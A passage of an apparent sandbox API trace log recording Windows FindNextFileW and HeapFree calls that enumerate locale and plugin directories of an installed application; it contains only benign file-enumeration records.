ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0175.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.706] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-it", cAlternateFileName="")) returned 1 [0175.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.707] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0175.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.707] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0175.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.707] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-no", cAlternateFileName="")) returned 1 [0175.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.707] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0175.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.707] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0175.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.707] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-br", cAlternateFileName="")) returned 1 [0175.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.708] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0175.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.708] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0175.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.708] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0175.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.708] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0175.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.708] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-si", cAlternateFileName="")) returned 1 [0175.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.708] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0175.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.709] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-se", cAlternateFileName="")) returned 1 [0175.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.709] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0175.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.709] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x0, dwReserved1=0x0, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0175.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.709] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0175.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.709] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0175.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.709] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8ab628, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8ab628, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8ab628, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0175.710] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0175.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.710] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x3bd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugin.js", cAlternateFileName="")) returned 1 [0175.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5161070 | out: hHeap=0x6a0000) returned 1 [0175.710] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rhp", cAlternateFileName="")) returned 0 [0175.710] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0175.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.711] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee8d1876, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee8d1876, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee8d1876, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugins", cAlternateFileName="")) returned 0 [0175.711] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0175.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.711] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee885476, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xee885476, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xee885476, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0175.711] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0175.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0175.713] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="dc-annotations", cAlternateFileName="DC-ANN~1")) returned 1 [0175.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.713] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0175.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.713] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed70183, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeed70183, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeed70183, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0175.713] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0175.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0175.714] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf109acf7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf109acf7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf109acf7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop-connector-files", cAlternateFileName="DESKTO~2")) returned 1 [0175.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.714] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf109acf7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf109acf7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0x1b7c046, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0175.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.770] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1264927, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf1264927, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf128ab91, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-es", cAlternateFileName="")) returned 1 [0175.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.770] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf109acf7, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf109acf7, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf109acf7, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0175.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.770] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf128ab91, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf128ab91, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf128ab91, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-dk", cAlternateFileName="")) returned 1 [0175.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.770] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b55e76, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b55e76, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-de", cAlternateFileName="")) returned 1 [0175.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.770] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b55e76, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b55e76, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-ae", cAlternateFileName="")) returned 1 [0175.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.771] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b55e76, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b55e76, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b55e76, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-gb", cAlternateFileName="")) returned 1 [0175.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.773] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf128ab91, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf128ab91, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf128ab91, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-il", cAlternateFileName="")) returned 1 [0175.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.773] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b2fd8e, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b2fd8e, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b2fd8e, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0175.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.774] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b2fd8e, ftCreationTime.dwHighDateTime=0x1d39f5e, ftLastAccessTime.dwLowDateTime=0x1b2fd8e, ftLastAccessTime.dwHighDateTime=0x1d39f5e, ftLastWriteTime.dwLowDateTime=0x1b2fd8e, ftLastWriteTime.dwHighDateTime=0x1d39f5e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu-es", cAlternateFileName="")) returned 1 [0175.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.774] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf128ab91, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xf128ab91, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xf128ab91, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0175.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.774] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b55e76, 